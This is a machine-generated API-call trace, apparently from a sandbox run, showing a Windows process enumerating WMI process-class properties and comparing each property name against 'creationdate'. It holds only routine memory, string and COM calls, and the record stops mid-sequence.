[0401.561] malloc (_Size=0x18) returned 0x209680
[0401.561] IWbemClassObject:Get (in: This=0x2c8c70, wszName="Formats", lFlags=0, pVal=0x16f1d8*(varType=0x0, wReserved1=0x778d, wReserved2=0x0, wReserved3=0x0, varVal1=0xffaa2b80, varVal2=0xffa7c79c), pType=0x0, plFlavor=0x0 | out: pVal=0x16f1d8*(varType=0x200d, wReserved1=0x778d, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e9480*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x2c62c0, rgsabound=((cElements=0x8, lLbound=0))), varVal2=0xffa7c79c), pType=0x0, plFlavor=0x0) returned 0x0
[0401.565] free (_Block=0x209680)
[0401.565] lstrlenW (lpString="SET") returned 3
[0401.565] lstrlenW (lpString="get") returned 3
[0401.565] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="SET", cchCount2=3) returned 1
[0401.565] SafeArrayGetLBound (in: psa=0x2e9480, nDim=0x1, plLbound=0x16f170 | out: plLbound=0x16f170) returned 0x0
[0401.565] SafeArrayGetUBound (in: psa=0x2e9480, nDim=0x1, plUbound=0x16f16c | out: plUbound=0x16f16c) returned 0x0
[0401.565] SafeArrayGetElement (in: psa=0x2e9480, rgIndices=0x16f160, pv=0x16f148 | out: pv=0x16f148) returned 0x0
[0401.566] malloc (_Size=0x18) returned 0x209680
[0401.566] IWbemClassObject:Get (in: This=0x2c9140, wszName="Name", lFlags=0, pVal=0x16f1b8*(varType=0x0, wReserved1=0xff7d, wReserved2=0x7fe, wReserved3=0x0, varVal1=0x3, varVal2=0x8), pType=0x0, plFlavor=0x0 | out: pVal=0x16f1b8*(varType=0x8, wReserved1=0xff7d, wReserved2=0x7fe, wReserved3=0x0, varVal1="STATUS", varVal2=0x8), pType=0x0, plFlavor=0x0) returned 0x0
[0401.566] free (_Block=0x209680)
[0401.566] malloc (_Size=0x18) returned 0x209680
[0401.566] lstrlenW (lpString="FULL") returned 4
[0401.566] lstrlenW (lpString="STATUS") returned 6
[0401.566] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STATUS", cchCount1=6, lpString2="FULL", cchCount2=4) returned 3
[0401.566] free (_Block=0x209680)
[0401.566] IUnknown:Release (This=0x2c9140) returned 0x1
[0401.566] SafeArrayGetElement (in: psa=0x2e9480, rgIndices=0x16f160, pv=0x16f148 | out: pv=0x16f148) returned 0x0
[0401.567] malloc (_Size=0x18) returned 0x209680
[0401.567] IWbemClassObject:Get (in: This=0x2c93f0, wszName="Name", lFlags=0, pVal=0x16f1b8*(varType=0x0, wReserved1=0xff7d, wReserved2=0x7fe, wReserved3=0x0, varVal1=0x2e4d18, varVal2=0x8), pType=0x0, plFlavor=0x0 | out: pVal=0x16f1b8*(varType=0x8, wReserved1=0xff7d, wReserved2=0x7fe, wReserved3=0x0, varVal1="MEMORY", varVal2=0x8), pType=0x0, plFlavor=0x0) returned 0x0
[0401.567] free (_Block=0x209680)
[0401.567] malloc (_Size=0x18) returned 0x209680
[0401.567] lstrlenW (lpString="FULL") returned 4
[0401.567] lstrlenW (lpString="MEMORY") returned 6
[0401.567] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MEMORY", cchCount1=6, lpString2="FULL", cchCount2=4) returned 3
[0401.567] free (_Block=0x209680)
[0401.567] IUnknown:Release (This=0x2c93f0) returned 0x1
[0401.567] SafeArrayGetElement (in: psa=0x2e9480, rgIndices=0x16f160, pv=0x16f148 | out: pv=0x16f148) returned 0x0
[0401.567] malloc (_Size=0x18) returned 0x209680
[0401.568] IWbemClassObject:Get (in: This=0x2c96a0, wszName="Name", lFlags=0, pVal=0x16f1b8*(varType=0x0, wReserved1=0xff7d, wReserved2=0x7fe, wReserved3=0x0, varVal1=0x2e4d18, varVal2=0x8), pType=0x0, plFlavor=0x0 | out: pVal=0x16f1b8*(varType=0x8, wReserved1=0xff7d, wReserved2=0x7fe, wReserved3=0x0, varVal1="FULL", varVal2=0x8), pType=0x0, plFlavor=0x0) returned 0x0
[0401.568] free (_Block=0x209680)
[0401.568] malloc (_Size=0x18) returned 0x209680
[0401.568] lstrlenW (lpString="FULL") returned 4
[0401.568] lstrlenW (lpString="FULL") returned 4
[0401.568] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="FULL", cchCount1=4, lpString2="FULL", cchCount2=4) returned 2
[0401.568] free (_Block=0x209680)
[0401.568] malloc (_Size=0x18) returned 0x209680
[0401.568] IWbemClassObject:Get (in: This=0x2c96a0, wszName="Properties", lFlags=0, pVal=0x16f1f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffaa2ac0, varVal2=0x2002a8), pType=0x0, plFlavor=0x0 | out: pVal=0x16f1f0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e95c0*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x2c9950, rgsabound=((cElements=0x28, lLbound=0))), varVal2=0x2002a8), pType=0x0, plFlavor=0x0) returned 0x0
[0401.572] free (_Block=0x209680)
[0401.572] SafeArrayGetLBound (in: psa=0x2e95c0, nDim=0x1, plLbound=0x16f180 | out: plLbound=0x16f180) returned 0x0
[0401.572] SafeArrayGetUBound (in: psa=0x2e95c0, nDim=0x1, plUbound=0x16f188 | out: plUbound=0x16f188) returned 0x0
[0401.573] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.573] malloc (_Size=0x18) returned 0x209680
[0401.573] IWbemClassObject:Get (in: This=0x32d710, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x0, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="CommandLine", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.573] free (_Block=0x209680)
[0401.573] malloc (_Size=0x18) returned 0x209680
[0401.573] IWbemClassObject:Get (in: This=0x32d710, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CommandLine", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.573] free (_Block=0x209680)
[0401.573] malloc (_Size=0x18) returned 0x209680
[0401.573] lstrlenW (lpString="CommandLine") returned 11
[0401.573] lstrlenW (lpString="creationdate") returned 12
[0401.573] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="CommandLine", cchCount2=11) returned 3
[0401.574] free (_Block=0x209680)
[0401.574] IUnknown:Release (This=0x32d710) returned 0x1
[0401.574] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.574] malloc (_Size=0x18) returned 0x209680
[0401.574] IWbemClassObject:Get (in: This=0x32db80, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="CommandLine", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="CSName", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.574] free (_Block=0x209680)
[0401.574] malloc (_Size=0x18) returned 0x209680
[0401.574] IWbemClassObject:Get (in: This=0x32db80, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CommandLine", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSName", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.574] free (_Block=0x209680)
[0401.574] malloc (_Size=0x18) returned 0x209680
[0401.574] lstrlenW (lpString="CSName") returned 6
[0401.574] lstrlenW (lpString="creationdate") returned 12
[0401.574] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="CSName", cchCount2=6) returned 1
[0401.575] free (_Block=0x209680)
[0401.575] IUnknown:Release (This=0x32db80) returned 0x1
[0401.575] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.575] malloc (_Size=0x18) returned 0x209680
[0401.575] IWbemClassObject:Get (in: This=0x32e080, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="CSName", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Description", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.575] free (_Block=0x209680)
[0401.575] malloc (_Size=0x18) returned 0x209680
[0401.575] IWbemClassObject:Get (in: This=0x32e080, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSName", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Description", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.575] free (_Block=0x209680)
[0401.575] malloc (_Size=0x18) returned 0x209680
[0401.576] lstrlenW (lpString="Description") returned 11
[0401.576] lstrlenW (lpString="creationdate") returned 12
[0401.576] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="Description", cchCount2=11) returned 1
[0401.576] free (_Block=0x209680)
[0401.576] IUnknown:Release (This=0x32e080) returned 0x1
[0401.576] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.576] malloc (_Size=0x18) returned 0x209680
[0401.576] IWbemClassObject:Get (in: This=0x32e5b0, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Description", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutablePath", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.576] free (_Block=0x209680)
[0401.576] malloc (_Size=0x18) returned 0x209680
[0401.576] IWbemClassObject:Get (in: This=0x32e5b0, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Description", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutablePath", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.576] free (_Block=0x209680)
[0401.577] malloc (_Size=0x18) returned 0x209680
[0401.577] lstrlenW (lpString="ExecutablePath") returned 14
[0401.577] lstrlenW (lpString="creationdate") returned 12
[0401.577] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="ExecutablePath", cchCount2=14) returned 1
[0401.577] free (_Block=0x209680)
[0401.577] IUnknown:Release (This=0x32e5b0) returned 0x1
[0401.577] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.577] malloc (_Size=0x18) returned 0x209680
[0401.577] IWbemClassObject:Get (in: This=0x32ed20, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutablePath", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutionState", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.577] free (_Block=0x209680)
[0401.577] malloc (_Size=0x18) returned 0x209680
[0401.577] IWbemClassObject:Get (in: This=0x32ed20, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutablePath", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutionState", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.578] free (_Block=0x209680)
[0401.578] malloc (_Size=0x18) returned 0x209680
[0401.578] lstrlenW (lpString="ExecutionState") returned 14
[0401.578] lstrlenW (lpString="creationdate") returned 12
[0401.578] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="ExecutionState", cchCount2=14) returned 1
[0401.578] free (_Block=0x209680)
[0401.578] IUnknown:Release (This=0x32ed20) returned 0x1
[0401.578] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.578] malloc (_Size=0x18) returned 0x209680
[0401.578] IWbemClassObject:Get (in: This=0x32f210, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutionState", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Handle", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.578] free (_Block=0x209680)
[0401.578] malloc (_Size=0x18) returned 0x209680
[0401.579] IWbemClassObject:Get (in: This=0x32f210, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutionState", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Handle", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.579] free (_Block=0x209680)
[0401.579] malloc (_Size=0x18) returned 0x209680
[0401.579] lstrlenW (lpString="Handle") returned 6
[0401.579] lstrlenW (lpString="creationdate") returned 12
[0401.579] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="Handle", cchCount2=6) returned 1
[0401.579] free (_Block=0x209680)
[0401.579] IUnknown:Release (This=0x32f210) returned 0x1
[0401.579] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.579] malloc (_Size=0x18) returned 0x209680
[0401.579] IWbemClassObject:Get (in: This=0x32f850, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Handle", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="HandleCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.580] free (_Block=0x209680)
[0401.580] malloc (_Size=0x18) returned 0x209680
[0401.580] IWbemClassObject:Get (in: This=0x32f850, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Handle", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HandleCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.580] free (_Block=0x209680)
[0401.580] malloc (_Size=0x18) returned 0x209680
[0401.580] lstrlenW (lpString="HandleCount") returned 11
[0401.580] lstrlenW (lpString="creationdate") returned 12
[0401.580] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="HandleCount", cchCount2=11) returned 1
[0401.580] free (_Block=0x209680)
[0401.580] IUnknown:Release (This=0x32f850) returned 0x1
[0401.580] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.581] malloc (_Size=0x18) returned 0x209680
[0401.581] IWbemClassObject:Get (in: This=0x32fda0, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="HandleCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="InstallDate", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.581] free (_Block=0x209680)
[0401.581] malloc (_Size=0x18) returned 0x209680
[0401.581] IWbemClassObject:Get (in: This=0x32fda0, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HandleCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InstallDate", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.581] free (_Block=0x209680)
[0401.581] malloc (_Size=0x18) returned 0x209680
[0401.581] lstrlenW (lpString="InstallDate") returned 11
[0401.581] lstrlenW (lpString="creationdate") returned 12
[0401.581] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="InstallDate", cchCount2=11) returned 1
[0401.582] free (_Block=0x209680)
[0401.582] IUnknown:Release (This=0x32fda0) returned 0x1
[0401.582] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.582] malloc (_Size=0x18) returned 0x209680
[0401.582] IWbemClassObject:Get (in: This=0x3302f0, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="InstallDate", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="KernelModeTime", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.582] free (_Block=0x209680)
[0401.582] malloc (_Size=0x18) returned 0x209680
[0401.582] IWbemClassObject:Get (in: This=0x3302f0, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InstallDate", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="KernelModeTime", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.582] free (_Block=0x209680)
[0401.582] malloc (_Size=0x18) returned 0x209680
[0401.582] lstrlenW (lpString="KernelModeTime") returned 14
[0401.583] lstrlenW (lpString="creationdate") returned 12
[0401.583] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="KernelModeTime", cchCount2=14) returned 1
[0401.583] free (_Block=0x209680)
[0401.583] IUnknown:Release (This=0x3302f0) returned 0x1
[0401.583] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.583] malloc (_Size=0x18) returned 0x209680
[0401.583] IWbemClassObject:Get (in: This=0x3305a0, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="KernelModeTime", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="MaximumWorkingSetSize", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.583] free (_Block=0x209680)
[0401.583] malloc (_Size=0x18) returned 0x209680
[0401.583] IWbemClassObject:Get (in: This=0x3305a0, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="KernelModeTime", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MaximumWorkingSetSize", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.584] free (_Block=0x209680)
[0401.584] malloc (_Size=0x18) returned 0x209680
[0401.584] lstrlenW (lpString="MaximumWorkingSetSize") returned 21
[0401.584] lstrlenW (lpString="creationdate") returned 12
[0401.584] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="MaximumWorkingSetSize", cchCount2=21) returned 1
[0401.584] free (_Block=0x209680)
[0401.584] IUnknown:Release (This=0x3305a0) returned 0x1
[0401.584] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.584] malloc (_Size=0x18) returned 0x209680
[0401.584] IWbemClassObject:Get (in: This=0x330850, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="MaximumWorkingSetSize", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="MinimumWorkingSetSize", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.584] free (_Block=0x209680)
[0401.584] malloc (_Size=0x18) returned 0x209680
[0401.585] IWbemClassObject:Get (in: This=0x330850, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MaximumWorkingSetSize", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MinimumWorkingSetSize", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.585] free (_Block=0x209680)
[0401.585] malloc (_Size=0x18) returned 0x209680
[0401.585] lstrlenW (lpString="MinimumWorkingSetSize") returned 21
[0401.585] lstrlenW (lpString="creationdate") returned 12
[0401.585] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="MinimumWorkingSetSize", cchCount2=21) returned 1
[0401.585] free (_Block=0x209680)
[0401.585] IUnknown:Release (This=0x330850) returned 0x1
[0401.585] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.585] malloc (_Size=0x18) returned 0x209680
[0401.585] IWbemClassObject:Get (in: This=0x330b00, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="MinimumWorkingSetSize", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Name", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.586] free (_Block=0x209680)
[0401.586] malloc (_Size=0x18) returned 0x209680
[0401.586] IWbemClassObject:Get (in: This=0x330b00, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MinimumWorkingSetSize", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Name", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.586] free (_Block=0x209680)
[0401.586] malloc (_Size=0x18) returned 0x209680
[0401.586] lstrlenW (lpString="Name") returned 4
[0401.586] lstrlenW (lpString="creationdate") returned 12
[0401.586] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="Name", cchCount2=4) returned 1
[0401.586] free (_Block=0x209680)
[0401.586] IUnknown:Release (This=0x330b00) returned 0x1
[0401.586] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.586] malloc (_Size=0x18) returned 0x209680
[0401.587] IWbemClassObject:Get (in: This=0x330db0, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Name", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="OSName", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.587] free (_Block=0x209680)
[0401.587] malloc (_Size=0x18) returned 0x209680
[0401.587] IWbemClassObject:Get (in: This=0x330db0, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Name", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OSName", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.587] free (_Block=0x209680)
[0401.587] malloc (_Size=0x18) returned 0x209680
[0401.587] lstrlenW (lpString="OSName") returned 6
[0401.587] lstrlenW (lpString="creationdate") returned 12
[0401.587] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="OSName", cchCount2=6) returned 1
[0401.587] free (_Block=0x209680)
[0401.588] IUnknown:Release (This=0x330db0) returned 0x1
[0401.588] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.588] malloc (_Size=0x18) returned 0x209680
[0401.588] IWbemClassObject:Get (in: This=0x331060, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="OSName", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="OtherOperationCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.588] free (_Block=0x209680)
[0401.588] malloc (_Size=0x18) returned 0x209680
[0401.588] IWbemClassObject:Get (in: This=0x331060, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OSName", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OtherOperationCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.588] free (_Block=0x209680)
[0401.588] malloc (_Size=0x18) returned 0x209680
[0401.588] lstrlenW (lpString="OtherOperationCount") returned 19
[0401.588] lstrlenW (lpString="creationdate") returned 12
[0401.588] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="OtherOperationCount", cchCount2=19) returned 1
[0401.589] free (_Block=0x209680)
[0401.589] IUnknown:Release (This=0x331060) returned 0x1
[0401.589] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.589] malloc (_Size=0x18) returned 0x209680
[0401.589] IWbemClassObject:Get (in: This=0x331310, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="OtherOperationCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="OtherTransferCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.589] free (_Block=0x209680)
[0401.589] malloc (_Size=0x18) returned 0x209680
[0401.589] IWbemClassObject:Get (in: This=0x331310, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OtherOperationCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OtherTransferCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.589] free (_Block=0x209680)
[0401.589] malloc (_Size=0x18) returned 0x209680
[0401.590] lstrlenW (lpString="OtherTransferCount") returned 18
